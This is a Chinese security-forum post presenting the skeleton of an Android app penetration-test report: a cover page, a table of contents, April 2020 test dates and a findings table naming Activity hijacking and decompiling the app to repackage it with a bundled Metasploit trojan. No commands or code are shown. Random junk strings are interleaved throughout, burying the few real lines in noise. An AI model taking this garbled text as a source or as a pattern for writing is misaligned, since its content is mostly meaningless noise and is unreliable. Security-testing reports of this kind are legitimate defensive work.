找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
返回列表 发新帖
查看: 5071|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
( e2 ?& \6 E" D9 M. z5 H! q + \' Z3 ]% V9 ^+ Q0 n8 {7 e1 W& f

, x/ i# H& W) L2 G3 e- Y1 q/ i) h4 H! y2 A' b
6 ?* R4 i% X% t, T+ E1 v * p' t, I3 o% Q. W( ]2 x

* D7 J- F" r0 v7 o: J2 e. L2 C* k" R' ^2 ]+ T
4 b2 |' H1 q% k) x a 6 A1 a, x% X) N4 Z `, Z

! o; _$ [; s' Y. h7 ~- p" |* _4 @7 T' ?/ [3 b+ U6 Z 文档编号:                + j6 h: H. J4 ]( T& P7 O; _2 Z 0 `& f% ?3 g1 i6 |: q' w

; e( q" T' u; m" @# u- V. J8 p9 W1 z* F Z

3 l9 v' y8 R6 Q& M/ t& ?( i, Z9 e7 F/ y   & A* q# ?- K/ q1 d9 {/ N / d3 [0 a! K) S1 L# h5 m- H

+ K I8 ?( B: A% k) G; ], x9 v& G& r$ {3 i/ O% W: C* X

/ Y& U, B) p' |0 y6 U4 w9 h( e M& B1 g, L, }5 c% Q4 o+ P# @6 m   / w( }5 b' N& ~ z) C7 Z& o 3 h2 f9 F" x" }

$ n" `4 @$ @5 Y e ; k- T* \! K7 A+ G; {1 ^

( j, q9 I3 d# g/ j# t9 d2 ~# U) j5 V$ k8 d! ]/ ]( S4 P* }   8 Z' M. U& X9 k. u* t& z3 M3 o3 Y. a& T

- d& Y' K3 M, r' n4 z" J' ~, i# n/ y+ Y! `6 K* C: r, B

/ d; M* T& t! ] i ! B9 S7 `5 @/ q' S# L   5 P9 W R5 F- x+ \% Y4 ] . Z$ F- O& m4 t- Z0 n

, P$ `- E, `) Q) R$ J# g 5 P2 ~) S9 _. s7 g |4 T5 a

! H/ W- d* \: Q4 Y' G; n- i+ ` ) l) M, j3 C9 j   % x* }/ a; X- _: Z " d- \* v( Q( t2 c$ _5 O1 h

* ^- t) c3 D. C f1 |2 m * k w. R2 f" @7 R# Z

% |% |; k& @+ T2 G, g9 r5 v) f. D9 y. G5 l8 R 某某某APP渗透测试 ; O. r S r* C4 U* C% C6 {7 x) H" F/ j! B/ u

& P9 b. i2 ^$ B: b# w; O+ X# J 5 c* S2 ^$ J" d$ `! v/ y) L5 J% e

4 e4 F) n& U+ v, ] % e. C9 a. ~; C9 L) u* D- P   9 T( Q9 X3 d5 x7 K+ i * x2 A, k! {+ ]2 Q* M) J. a* i0 A

- e, y$ m ]+ B) e5 {6 \ 2 ^! j6 N$ X2 A/ R

7 ~$ V x p& `7 m3 }" o% T$ Z5 I8 s) K5 _& Y+ v( k   $ r+ l* N) t G8 s 0 X9 z, K6 Z' Y% {9 |! K+ s

3 x5 O: f% {" u8 }/ I" X' A ; S! q6 l; l; B k+ F

2 |& Q- C6 Y$ ~; B" K1 n5 \ 2 |4 J6 k0 l j% P4 j/ B& t, g   7 j- L& V" L9 u+ L" J C# d M A% A4 u s- x9 M

7 }5 ~9 ^8 d9 O- X* t/ e8 Y+ i, u. b/ ~5 Q9 u5 p+ T

6 T8 \6 }" U6 D! G( r' l+ y _5 U7 p 2 E4 {& c% _- v' A2 ~; D   / h$ c) ^; l8 k1 r& T& g4 @ 7 y0 P! m( d9 t# S

# ^) N! [1 D v+ L6 \: \, Z$ E9 J ; N* C o1 I; r* e- s8 U; M& {

2 H: k4 @1 y( R$ r- j / n$ U& S2 J% d 技 术 报 告 : H9 N) v$ A# k 8 i) t3 G' P- K* K

) F. l5 C5 D/ S! U L7 D `& v! L' N7 X

. Y5 g3 m6 K- y: B9 b: o1 P% E 0 n0 `+ E C: m/ q2 z   4 c) q6 V/ b! |- L8 I ; |% n5 n8 z6 |# Y B( o

5 Q- {$ X m/ }# Z& e2 z( ~% z ^+ [

, y$ {- W; K4 A+ t, z - ~7 |( g1 g7 z8 l   5 V3 s G1 `" ^0 F/ S1 W 3 ~) m0 d) [6 n D% r K6 ?

1 X2 a0 f \9 Y/ r! U 7 E4 y1 t: v# O) D$ ~

* }8 S" c! K5 C1 f, u2 @5 Q, d+ s- W   ' I8 Q) H& v1 M% `5 n" k2 Y# F 6 v! D# s! A* }

7 x4 y; J1 J8 M- q. g7 ]9 k! O- ]0 \* E. [

; c% k& z$ B7 M/ o% Y+ Y+ p' S3 d$ I# a, Q5 ~   * z9 s+ S4 j! n2 H) `, b+ ^: g, s 4 w: ?' p/ E. a4 f+ J8 R' v! @

# H$ H' s, m& ^! Z4 C- D" u0 y& O p' g# I% Z% |# F/ l

* n& b h+ V2 Z1 W2 N- |* l) e9 `: O' @6 j( l; z5 \# P* F   3 y& P' [6 i: }$ l , w$ k* \8 ?; t( a

+ G$ s& L Z4 L. d% { ) k- R2 V* B$ a; V- ^

8 l8 l/ B* x9 F' X! m% X) {$ ]: Q! y4 Z& i* g   6 j6 |$ v3 t& Q4 d, m4 _2 S % C# c! v3 _4 o3 I" K

- k0 [, c" L/ q" b- T 9 u' U4 a; _" h1 B, [

, O5 H, v8 U7 `' \7 [+ \ . K e7 r) H3 N1 P7 O   , S8 [+ w: f# x/ k " B" h8 U5 E+ Y

. ]) M4 O7 D5 m; L% r! s ! b9 y4 t R. U4 ?( d9 R

, _, u: r9 [' h8 T2 ^" r ( A$ n2 C# X$ ^- L+ N   ' g2 i2 z& m4 A8 @5 }7 o8 y5 l0 e+ a$ L, \

6 g- l$ o2 P: ~; h7 a; b3 `* ^ & n$ n* _& o, f3 u, ]5 Z; u; A( T

; Y0 G; U6 ^& A# c! k: f ! r- j. D9 x; W0 [9 I: ~   1 y9 z3 I5 s3 {$ R% _ , e3 S+ ]) B. u j I

( l: h+ ~7 M" i2 }/ o G# h X" m2 s: I' R% U) D

3 Y7 Z4 K9 @/ Q0 f. L 5 |& `# o3 g d7 ~3 T, M4 D" Y% p; V   ! ]' g/ S2 ]' E. z5 Z % v0 N- T2 C1 |

( D3 k g i' D" _0 p% D; _ P5 y; o t; ~. I# m

0 N1 k! @# B9 D7 W; n4 R. P) z * b3 U9 y$ j" D" O   # J$ U' S" D. B9 [ ; P0 F2 u/ q9 j

7 R( j# D% S$ d $ @- U, I3 k9 b; h- L: P8 F/ j- P

/ T% ~7 ]* S5 y# _4 l3 q+ f5 X9 m7 L& F! A9 N6 M   - q* P1 A. M: P/ e" Q( j6 N- N5 V; z( {& A1 y+ P7 T* s

2 V% H6 R6 t( B a) U' L* Q6 X V. { G* i4 M! p, w b5 m

x+ t. b: ]5 [" _% c5 a+ k / t: ~ f: T+ X   3 @) o- i$ q0 J( z! ?% A, M: K" y

0 l. N& {1 A, D# S0 S! v8 ^' ?8 A# p6 j

# \- |3 s: p. k: ?2 z$ Z& F 4 U. p2 d1 s( x' W% h# p   % `% Y3 X9 a0 j! {- v: H6 W& f/ v3 c. U5 Q" @6 Y- L% k h2 m( t

% m5 K+ q4 H6 e. [2 c* w# t ' I) G! D: r+ ?9 ?- Q

8 \- h! f& f% |6 p ( Z: @) l' e+ O1 k" f4 `   / d. T) _9 |- T# h4 l+ F4 g. P4 @ & Q4 B: z+ I+ j3 r: N

- B) S& O1 r* c- m. u2 s" J 2 M$ z6 ?+ I* J( s4 z& W; T! Q8 S

: ^ ` V) q. M9 n ! g( E3 c' C& ]# M# K5 G   7 V: T. v! F( S# s% d1 |9 k ] 9 p, q( W+ H# K

1 w, o2 \# ^+ Z4 ?& H$ G ; b# y: l0 d5 D' K$ N! D. |! I

5 D' [ C5 O' @& g5 F; @' v 4 s/ C- P6 \+ I- d5 M   3 v; g! S6 R! @) L/ s6 B; o( M8 d, m7 V' }! G! E: U L

$ }) H3 K# ~2 d9 t8 I6 O% f, [, ?

3 i* w- P9 M: N9 ^3 N 6 H' C$ E) _1 }7 Y/ ^4 d' W   $ r7 q, X. E7 f }: c 4 o9 y4 ?5 C" R5 o4 R

) T5 z: v2 F" ~; C' } $ H4 m8 K/ F; L# `3 a

$ Q; x# i( M8 [: L' u( d( x' L8 ~+ K 二〇二〇年 + b6 C5 k* e) P$ w; I3 x 8 z4 l: G* q" F

, X) s7 E; g3 M3 W- @: j$ M8 U7 o9 y$ \$ ]" f0 x8 m
4 x/ B' ]. }& N4 k5 F : w) c7 Q' X/ X8 L* c$ f
0 ~& Q/ K6 T. @ l ' t- H/ }% H0 j( C; q3 N7 h& j, P ; n: i- Z% P0 T3 a# n: t( W( S% r9 N- J: F1 d0 V
# k4 \$ ^% }5 A: v1 {! C G5 y * A M2 y5 _( P, o; z& Z" b1 X
) q1 ^# Q* Q8 {- C. k6 r. C/ T% @" a2 d# M, ^
7 Z& F! t; ^' H4 { 2 e5 v1 R9 [8 L. ^* V# W+ s # P0 w0 K. T: d. z1 f ' o3 {! i4 V0 L" s' r% O
$ h; N) h, T) q* Z3 l/ e ' q) j# V' G: M( I+ Q

/ ~9 g- C+ G/ D$ j/ ?; e' R/ M! I4 T2 u' g: K 目 录 : D" v B8 | R. x" i0 ] % A8 F* i5 N' ]' l& h- e7 O6 I

' B: h5 v( s! o- w T' e 2 b. C( \+ J5 e$ r ) A' J0 B* H, o5 z" [7 q1 Z' z+ Z( s) r/ V5 ]0 }1 y

6 Q+ H8 S: O: O) c+ B! D7 N+ D5 q2 y; c) Y; ~- w) U   ^+ \+ K4 S8 k, j& s+ I% H3 T; B9 l ; u$ U9 F5 V5 a" i- G4 G8 |/ y

8 S' u: w n4 _4 k! s/ o' n/ R 1 a: K8 ~0 u: h3 r/ v6 c

7 \4 N# l9 I0 j# A3 x( j; t7 O* n r7 ?$ g& m$ ^ 1 概述... 3 % u/ v9 y7 k9 l7 m+ ~) [& l) Q, ?5 V: m) G3 `- I

8 r* \( n. O; X/ S! G 3 a' a* S$ F4 a5 G X( t

- ^7 `- o8 A9 }7 g, K " _. B( h/ {& u* V! t6 F S: v$ i 1.2测试时间... 3 * J! I+ b$ f5 u9 K; Y5 B , {$ p9 [/ `; G" `# G: _& _

. x6 P: V# y/ \9 F& l , ] I& o+ q& w

3 U+ k/ r. H6 Z; B$ d4 b, W 7 y) B0 ]1 F" H 1.3测试对象... 3 3 T1 y- W% k1 m * G( N' l6 S0 ?: M* l! O

& t4 c; Q, |6 X- S I , K9 ]- ~4 {) z8 w3 ^& t

0 B2 ^9 j& B: }; o& s; M' a+ o ) T& f9 \8 |6 b6 \: }( b1 k 1.4测试结果... 3 - H! v# y: J$ E+ h( r. ] 4 P# |8 A& W4 e" N

7 i5 h V% a, |) Q7 j/ g1 H/ J3 C* @8 c( U4 k& {( g

' g4 |' W5 S8 v" v( R8 y' ?. P$ _" m' S0 m. O 2 检测结果... 4 3 O( z8 }+ [& n1 W( D n3 S $ T% V8 K0 [5 ^2 L2 \

1 A& S( W2 o# Q ?0 t& X : f7 E( e4 o* v, G, D" U! d/ M1 @

' s3 T4 A) @ P; z5 Q4 i- v) u$ m% }: T W" G 2.1 某某某... 4 0 s3 S! j- ~9 Q+ K% Z! d ! D1 u9 A2 @# x2 ~3 B0 ^5 ]6 O: @

: K6 T2 ~, Q) P* f 9 N R0 }: K4 `- N$ M

0 _7 s8 `' h$ u2 ^3 e7 e+ q$ | 5 i/ t9 ]4 X; b& g5 b/ e( l: B 2.1.1检测目标... 4 - T! ]2 z2 ?4 C& b: D1 N" j9 L# \; n8 E7 f: D

2 B" ]) M( N" F) W% q( _4 O , h1 }" j% f P

8 H3 h( U, e* b9 z: c0 B v9 S( `# p: y$ P2 k 2.1.2检测结果... 4 0 X, P/ D6 a5 m+ {* [: p4 a ; R- o, w' o& x3 ^) r, z# N

7 w# _: O& G _" H7 Q$ a ' u: Z7 Y( l3 s+ L

3 e5 Q( T) u5 q" p' \; D$ m2 B3 D# s1 U 2.1.2.1. 4 & I. v! i \9 D( z' y% @ " K& M# E8 T4 P& x& C$ ]! D

5 X& V& ?& u( ^9 z0 K1 ^0 M ; M T7 b2 l( G. O& U( `

9 M, |! S X3 P! t e 8 o5 M2 U5 n2 j/ f5 O& U8 l 2.1.2.2. 6 0 e! }% I* {- [8 ~+ ~0 m9 b & T' A. [3 k" F

3 Y8 h6 I2 t/ X* q. O+ V 2 H4 F' y) m9 X# K

% h/ v4 E7 G" |2 t! o , U: y- B1 v; @, y4 O- R" H 4 ?6 Y1 n: j1 E! S3 n3 P9 X1 e% T/ l8 N

' M; `) @- l. n' v6 D# g+ C3 r" z* l0 b$ h: [ & O* N) l- c4 I; ^( ^ 9 Z9 f9 e; R' Z3 Y
, A5 h8 R! B0 u+ } % [3 D1 L' ?) p3 R
) L* R: v* I2 ` ; N8 E. S5 c" a( b6 | % J& u! k! `+ k( m6 K" X $ N- U. Z% G* D2 o* z2 o- v

& _9 n# H, {/ N5 q+ z, [ & G# M. H( n/ f! N8 L 1 概述 ' G+ _% @6 A- f- G1 _0 _1 {* F8 ~7 D2 S

: d& }8 L. ~" T/ H # d/ G$ p6 |- A% |5 _+ G2 M

# A$ P5 f( y! O7 l/ O2 U 1 f5 V2 U3 P7 E+ u( T 1.2测试时间 ) L3 t) [; C6 `: h/ t2 r( c* [9 `" _. ~- ~- _ N+ ^

. @ P2 k& R1 x' t& ~) Q2 v & t# Q# {4 q! | # T4 e+ b% ]. b" F$ M6 H1 b7 F: Y! g) s' r2 N0 y" d4 q2 U- X5 K- p1 x' S# `6 R) l2 m! g% Y# K. J4 Y& ^1 _ w' g& ]; Y* E: q+ s" B$ l5 P9 D, f1 G) \% J( `: K3 ?2 S" }' X0 e+ T% d* y( ? l1 ]% D+ t a# j; Y# h( _* b$ @! n& j3 W+ F7 J. C2 T: \ {) [' W, \. p+ X' P5 q6 A: M! ]& p1 O4 R# u: U) H/ t& t# C6 b+ Z6 P# V$ |: X( A( k6 O& P/ s( ]( L, g4 c2 s) U4 ~0 U) J2 `) A# o" X1 Z! ?9 q* J/ s" u+ u' O! M7 J, k1 E$ P/ h* g2 Q; q0 L+ D/ J. B4 }( ~2 n8 B# T6 o* X7 q& c" C; f, P. U6 O/ h- L' s6 d5 T+ V# F' q4 G3 A/ G' f$ Z. i5 E ]" x& d, J4 |; m l2 E% c' f% u* G/ t W8 H8 m( c% p( s1 e* p: E3 l- y3 O k! h8 D7 w4 w0 h5 @ I+ n) [, `, N/ c9 e# B; v# z' B7 U3 d g1 {+ [, H l o d& I8 q& q U* ]: a- `2 h, R% o+ A% t g1 h
7 O. z0 ]8 [) D! g& R3 o / P* N- d- H) O- ~$ \9 n' P

, A# a1 q" t+ F: J/ o + B0 T1 e! ^* m3 B" a1 l 渗透测试时间 ; f# [, U6 @% E. T. `# n2 b( R- @& |5 S5 }% @- k4 e* Y

% }4 ]+ G* x2 B5 } 1 o* O# g8 g, `$ _) @# Q
. x9 l/ \* [% e: t* u7 L 8 |: g0 V$ }" {- m& n4 m% }1 }. r; F; L

5 H/ M; ]. p4 W& `7 s, _6 [( O $ ?8 Q/ ?* s. _* P0 k: |; _ 起始时间 3 s. W$ @) B5 p* q6 s# _- a ' \! j8 ~( A) v% j5 `. F* Q- b

1 \* L: K* j: m' A/ X7 D9 T2 W& \1 t' _& Z 		- K2 w$ E8 _6 } ?4 t" O ! b8 W7 U+ B* e& k7 E

1 x9 }$ d g- U7 p2 Q7 S/ n* e) m% f# E) v7 n; p0 k/ L# w 202046 # X0 B* U0 {% ?4 `1 Z c; n, }1 B% A2 |

) h+ ^! \5 Y, E% } 6 L' n( j3 C! c( X8 i& z+ {
7 t& u v9 A" l! x. {5 M & n d$ H: n. ^1 w: H

3 G3 Y' c q& ~- _7 p 9 c- P" O3 I2 q7 z' K 结束时间 + m9 g7 n. g2 _ ' Q6 O$ `: _8 e R7 h

- _ U+ b& Z; K , d8 V- n d3 V' D 		0 ~8 @1 R4 m# |$ f % t, u6 `0 S: z! P. H! [0 o

9 s: e) J" _" J+ f 3 D: n0 p* N1 z( ^+ k 202049 5 G" N: A' a. n# S' t7 s! K' h% O2 `/ _- ?: N- h

: ~- f0 E: M0 D c8 V : f4 v) [: n8 h) U* ]
" L3 c, {* M3 ]* [5 Z2 j6 N - c5 s" p4 l, u6 G

% z* X2 B$ _' |1 D' K8 L! a 5 e7 w, j( B/ n: Z 1.3测试对象 8 Z: Q) Z& U% X7 e* b. x6 H3 e: L9 _: h2 Q: C2 s8 Y

+ Y( o6 m3 M" ] 6 Z5 p) T; a$ o- t. U

( w- E# }, W& E. W! o' P# e . x3 x- G- A. H5 b* T 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: ! c. Q& [5 N* q7 n0 F% }% O+ v

- Y# w/ g `! t9 `+ c: B! J1 ~/ r 7 a. L8 t3 X2 _6 v! a: a8 g

9 m7 S4 L* y) a! f9 y# o" T# S ' ?# h$ a) O" ?. t' H 1-1 检测对象 . [4 K4 ^+ v6 ^8 A4 N. {4 |& t% E2 X

& E$ U3 K! I+ u. M3 _ . I0 }* y2 z1 J! B 8 A9 Y$ ~8 ]5 U0 l, _( x' U( Q0 z! M7 d& w5 [! L4 }4 C0 x+ I' s9 D1 c1 ?) @7 E$ j5 ]% E% b. H$ K6 |, ^) H, T5 T7 j* j& p9 A3 Y' m4 O! `' L2 ], l& f6 ^- c6 I1 P |5 j' f* r# G/ l; K, Q1 S& W3 n; h5 U; q8 e' K% ]; k9 a E7 X$ u' N7 y" G# Z& P: d+ t, T" ~4 W, z6 E! d2 r8 S; z1 n. Z: O) G# ?% N0 n: W- Y0 C. T9 Y8 M! T7 W4 w6 D9 _5 [- t( B# B n( G% K: k1 {4 [1 c$ o ^! N! T7 J) M1 Z! C2 p$ ^1 G5 b% k7 ~" q' c6 y5 v) K* L t6 v7 Q4 W1 J- W/ S- R% C E# Z- L. z* \. t- E$ K- o# k( r% z& l5 S& c( K7 S2 A1 J" J& f( Z% P8 U4 r- r* N- c7 S0 ?+ @% b, m4 l! g0 L8 [) E. q0 z- n. M+ l6 A4 R. X# Y5 _. p: v( N+ w$ I' w5 z# a M2 Y D" L" c1 I8 W: P; K9 C/ n5 J2 Y3 e3 E$ [6 w0 a% x$ |5 {9 o& f; \5 @5 h, G6 @* j! w$ ^
; ^' b! u' F6 J# X; S. U$ i) X( {) s7 Q5 P2 G/ k0 t; D. j

8 b* _" ^0 M+ `: P) c 6 I" f7 A! q1 o 序号 s |% X; s( f' ]' A1 F ; O C! n* C( \! b. _

; @" J% P. b! I7 P 1 S; C: M" b7 Y 		- J C! h! n; q' q; ~7 A % [4 `! e$ }8 k( E

! |. [2 S: w$ b, H" s 0 S9 b- W% T: a; J' L* l+ f 测试对象 4 @' C2 _; p: y; F y/ ]: c & J- i! w/ q9 p! Q0 w6 B/ `6 a

' V' e+ U+ w% y" ^( L% _ , k. d2 Q$ }2 t( d3 R 		% t: U. x0 i2 t. `$ t8 z6 W8 G$ y* b( m, ?( n

; _7 ^( D7 W3 ~ 5 P1 o% _4 F, X8 f 测试地址 3 p- ~) Y) z5 x 2 B8 T0 T* q7 ^( x, E: H3 E. Z+ N7 D" [

2 c( P J# d! _3 k4 d+ f. C, m 2 I! j9 B6 I+ ` 		& ^( T* w' z m5 O+ ]7 O0 d2 C : I0 i9 E7 {& I( {5 ~

, a' a; p$ o6 Y' A & M8 j! Q8 a0 @ I. N3 T; P 安全漏洞 2 F6 s. F$ _1 ~5 a _$ @5 ~0 F4 C) ]# n' i# D2 ^: G2 a2 f

" S: I- g9 }1 q7 d- | 3 j O: z- z" Z
4 }/ O x% F, @/ g2 g& X 3 u4 q3 x3 m/ U* M

8 p m7 K; a! p( S 0 ^5 I# g2 V/ ^$ ~$ [) W+ J 1 * L u( |. X$ C6 f: p5 l6 H+ u' j! g5 l3 z' R5 y& w

) t* Z) @3 w6 C& m L ( o9 G" y5 O1 [ 		- j0 E/ Q7 l3 P ]4 ~ ! I0 J: U1 I" s' p% A

9 ?3 f. O8 U! C4 A5 B9 D 0 F/ w9 I9 U8 e) Q6 N 某某某安卓APP & t. Q9 ]# P4 B8 r * }% J, E( h3 Y0 i7 B

+ H0 _& O X9 B" F4 f5 R( A - k7 P9 z3 l$ O3 o 		, X9 o) a5 ?, h 9 g- H) ~2 T9 R( ^* S! Z! A) s

/ K3 Y, S+ ~8 `5 L0 P' e! f0 P8 a3 T! P   ; E! Q$ @9 k. _ e - ?9 S/ I v5 E8 n0 {

[6 e9 Q' n3 x, A& S9 V5 t, p; _5 u& v6 N& I; p: u 		/ X; ^3 x- Z Y 4 x2 Q0 w' C, l- u! v4 i

* |3 P1 {" m& c( K4 J+ f } " _$ k9 H2 t f 2 . [& P) h# |+ b H1 j1 Q4 T+ B+ Y

$ @0 O5 X5 }! R: k! h& P, M( P1 \ / ?# q4 o) _8 w9 Q( G% n
7 m3 A* \, U% s+ r+ f, P5 K! z4 |7 a D; E( J# W

7 h% x+ {- d$ a. r8 ]9 K : G* h+ b7 x7 _( ]: H# _' ? 1.4测试结果 * u" \& P7 o) b7 o7 |* N$ V$ v' A- T" T+ f( A, ^: q

) e% y. N4 w7 a# t i0 }' b ?2 a: j# G

( i0 E' A3 K [* y# ~4 f8 H& o0 t , H( a# t* M, h. E4 I- v 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: ! P: A2 K2 ]5 d * | S' |* A* }7 ?

9 o6 R, `9 ^2 J; g7 \ P7 `% J1 n8 e9 u

: ]7 }& a8 n0 l7 T: g' z5 ]' d9 N' i   , J7 U# V) ]$ T 3 K0 g4 u3 ?0 ]# s4 p

3 B- @& o6 Q& }4 i& c0 Q- s6 A5 y
" W+ r" w2 }5 r- J" B* X 5 C" p4 w, Z6 h; ^' K 4 o* t1 T# G3 {6 x3 ^) J- V8 M) R" J$ P* K+ [/ Z5 k8 |# Q! ?9 \0 L7 T! ]3 J4 p; \- P' u7 y O2 X. L* r; E5 \9 ]+ u1 f; z6 x: y$ z' x; ^" s2 q$ |& K2 _% }8 z1 l+ m/ ^; t9 }; `0 c4 \) ^0 r- Y `$ a8 B, Z8 o I; I8 O" K0 b; ~9 r8 w3 W$ M2 q2 z) a. p7 N$ s0 m3 d% _# ]% R; y3 Z" O7 C' Q8 E+ D" R, m/ c; s5 I7 h2 ^$ S7 `7 D D i& z, ?4 Q( H0 q9 Q2 V$ C1 t7 m, ~ F; e. D; d8 }' a. t! k' _" e6 N$ V4 _. S9 Y: `7 H; D. E' M& X; \$ W: B, Z8 P- x7 r( V, c3 F, f% r0 |9 m" v# r0 U6 M9 g I0 L0 h, s; ]/ j" J* U, I/ k$ r) _0 s) x, z2 u" z- M2 }, h2 O: a5 K' G0 e/ k( z& l; d" j. G# H+ i2 w: z6 \8 _2 t; s6 E5 ?" Z9 h. U' U9 z% u( {7 ^+ s% z# N6 p, N, J) p9 w$ x1 H0 d2 @" D5 E7 O! v1 f: O; n" t* `0 ?7 i) j. Q) a" e! n8 S% U/ B# [. t; ~- \5 u$ E" { V/ i& E6 s( v. I+ j! Y6 k& Y! y! e- q: y( \: `1 O; e0 s: o9 M1 g) i9 R( @1 m" a( q8 l0 r! I5 V' K0 q+ u: c$ v0 n1 j$ G; x2 V; F( K& H5 B: u/ H6 [% e1 U+ c2 i0 j P8 {/ A: R! b; m4 f% c: d- R: n1 v8 I' U/ R: S, \5 ?/ E& d1 ~ U1 E( I" \, s2 _4 {( U( S' Z; m0 G& N1 |) j* J' ?% B% {% {6 z' V; W; C3 P( W; d, I. E0 ~5 H6 E! ^4 b" n8 H8 J0 m) D4 @7 c7 E% Q9 Q% x M+ |3 h6 T( i# S7 ^3 J" [' ^9 m7 M5 j& C9 U8 }$ ^4 P: E. j" O- l
; R! G P2 c% {4 C2 Y' N, b2 n, }3 ^6 U, K

7 l6 N) l+ w3 ^' X 3 H" q% z k$ e7 }7 i- F8 b 序号 6 u, Q2 n9 S! d/ K * i5 |7 k% M# R0 e6 ? s% M

. |3 f2 y% @. a9 [; N* T " l$ ~0 P: w; Y) f. P0 n3 [" [ 		: X" Y9 c/ f# G: H9 ?2 S4 ]+ U& Y! _. R: n# \2 q; ?

" Y# e1 t! ^1 B& f1 X. k0 c' C9 S' k* d% I7 T( j$ } 系统名称 ! h' h- K; P. V4 u/ Q' w& T: r/ c * z# I) @/ s0 }

4 a* G- _, ~- |% v5 R* o 6 T( n7 ~( [: s0 O4 J, N' W 		0 Q! ?. ^9 `. h: ~6 l/ g8 D7 C3 L# U7 L4 D% X

0 c* [/ ` O+ v" x0 ]. |) n4 f6 H* d+ ^1 Z8 j/ m* ^0 h T* U 漏洞名称 , I5 D5 O% w6 Z7 \+ O. H) P- ^0 G" R6 K1 f b/ O3 i

9 e$ G& r/ p! _9 N/ b: W" O% g$ B' Z" C! r 		& y7 G. T' y& m7 p' d9 ^; ?) E ) B' q! F4 d; T) n

) K5 j8 E5 u3 M/ M+ ^/ T. K9 s* i% |. V8 _0 ?. u8 N7 h 漏洞危害 + {4 I2 M* y" C4 k' y 8 e" ~7 L: y- d7 L

, H) j" l' j. d: K$ U7 A 6 \) p9 H& A( v& S6 P" K$ R 		1 ~" ]* {$ ^1 ] 0 R4 `; {5 _- Y K7 g R

$ t) U/ _3 A' J, \& x + u C5 X% h2 ~3 x1 s; I" T$ @ 修复结果 3 w6 E; O' P# _: i7 e 8 V# e R* b3 \# W5 K

- R4 r# }5 m$ `4 J; n" j t; }0 T % t7 [; }! v' r7 S
; h$ r& K+ ~& s7 Z2 m! n & }0 ?5 D* T6 k5 D

2 T, A+ C+ H/ \: V* e0 { , K! C0 S: K* T3 Y! ~+ @& f G, o7 N 1 3 |. ]4 Q# @2 I) k % _* _6 P* t, O, J. w5 k

: b! J* X! s3 V H0 z4 o5 P- H$ ^- T9 |0 @" ]5 s* x 		6 P6 k4 C- i. m( K' W; @3 p$ t 1 S2 T0 n Q7 W6 K4 l1 c [

4 w% Z. a$ p5 a9 Q/ x! H 2 V! v! D1 E* `3 Q) l$ H* v/ S3 J 某某某某某某APP ' f% L/ h4 ` _ B) c" b + h% b) e8 l! A! r

& i9 k- n5 k2 k+ S5 } 3 F5 S3 Y$ ^7 c; B+ g: S4 y" H; R9 Q* S 		0 e* m3 d" v; N: c6 b, n2 d0 X4 Z' j0 W H

% R" K) f: Z3 r+ K! }2 C ! [/ G" r6 v6 O7 T Activity 劫持 - |3 p4 _* L ]% U0 D3 ~! H$ \ % ~9 j" P* L3 D

9 j7 E7 e2 S' F6 ]5 } ; C; s0 n, o3 j* H4 _6 ~' u% h

2 q" ~7 L- G* i9 n! t2 G& h7 F3 Z& x! b8 c7 S   3 | ?3 X K" d& j# _! R+ A : m1 d4 D y: H$ | o2 k. P2 T9 C& w

6 ^5 ^; r/ a, E4 K " m7 r/ p, d) a& a 		8 ]0 v5 h' @4 z% W& k ?/ z/ j/ D/ U2 h) b/ J5 w' v

6 p, r! N' g: q9 R 9 A5 e9 _0 K' \$ U6 {3 X ' c/ G2 Q0 A S; r0 z+ o# @% P9 x# i 1 `* W6 m% ~; Z' e& f% P

2 p& S; e% L5 v2 c 1 i+ L' L* a( q: K/ \ 		- c: S4 n5 Y& `% Q $ c( f7 U( j% A* x l8 h" ]$ S

, ~2 T, [6 t7 i* V1 I# Z 8 V. v: r6 Y" @. w) s( |   5 @. z) u1 Q! H& T6 ~ 9 N# h# v/ l6 \6 N

+ P# \5 B1 Q) \' g% |6 L 1 O7 d+ I9 j6 j
6 o2 H |8 J4 m # M- K8 u5 g: X+ H v+ p& B" a, ]

/ c( S2 a- K& u2 ]8 s ! a6 q5 ]5 N! O' Z2 y" v 2 ) a+ w, o# y& j, H3 m, S$ z' _ & D$ ]5 Q m/ t6 c o

( Z; a3 _/ v+ l P! a, c: _( z 5 W/ s7 x/ Z9 ?$ b( k. G5 { 		" h* w0 [. \) t2 M0 @! C8 {# a3 u4 U4 R( ?

! X+ ]' \: [- Y5 L3 K# {& {, `, {+ M8 H8 Z) X* B 某某某某某某APP 7 o( s* e6 Q" L4 E, y# \ % [$ l; O3 v! A: h3 ^& m3 ?+ }

' h! g8 r }! X9 v5 Y7 { N: A+ E: E) d 		/ c2 i( A5 d- h' q% v+ ? 7 A. m/ ?) J h7 K: ^ O

0 X8 `8 S3 g" S- @( _" q& p 8 e [0 S, {7 z% } 反编译二次打包捆绑木马、篡改APP代码 1 L% j& [) N* s" C, E% }' E1 x$ M( N' D' d6 _

3 @( s* W/ x5 [9 X$ N( u- L: q' X, y6 v 		6 G/ R$ D& }0 S7 u; S) @1 q6 d# X( o6 E( O( ~- O

, E+ s& ]8 X7 Q' n# d 5 k; P& J: D$ O- {. v / r1 `' v& P" U) m8 { 6 o2 A& k' X- H/ y

% J/ h( M8 y" R% X: V$ I. k2 \# H# M+ D4 K. l. G2 Z' E4 ] 		& E) U: s- F) F# u$ P6 } ! n) Z' L7 s2 Z) M' ~0 y5 y% U( O0 J

8 y$ q6 Q. d" l: k4 o * r R1 U! t$ L7 Y   $ c- B# k2 j Q " Q) v% r9 j3 s- S) @; @

3 F; b- N. U1 d% v- I0 y* U" z2 k7 X/ z" F
" s+ m5 J- F0 Y0 M, g$ I# q0 ?7 i5 i: E' B2 e7 a, ^1 {
2 U: r8 G$ d; Y H% R: a( j. k ; i( l' A( K' i, H: B- |

& m) \% Z/ t3 T+ O0 G" |' w ; i8 W: ~6 w5 n; j3 S   ) |& A* ?3 j/ E9 C" P 7 o4 Z9 v4 b* ?

) e% z# D! |, Q; u! j% z1 A3 g # T9 C2 }) i* I

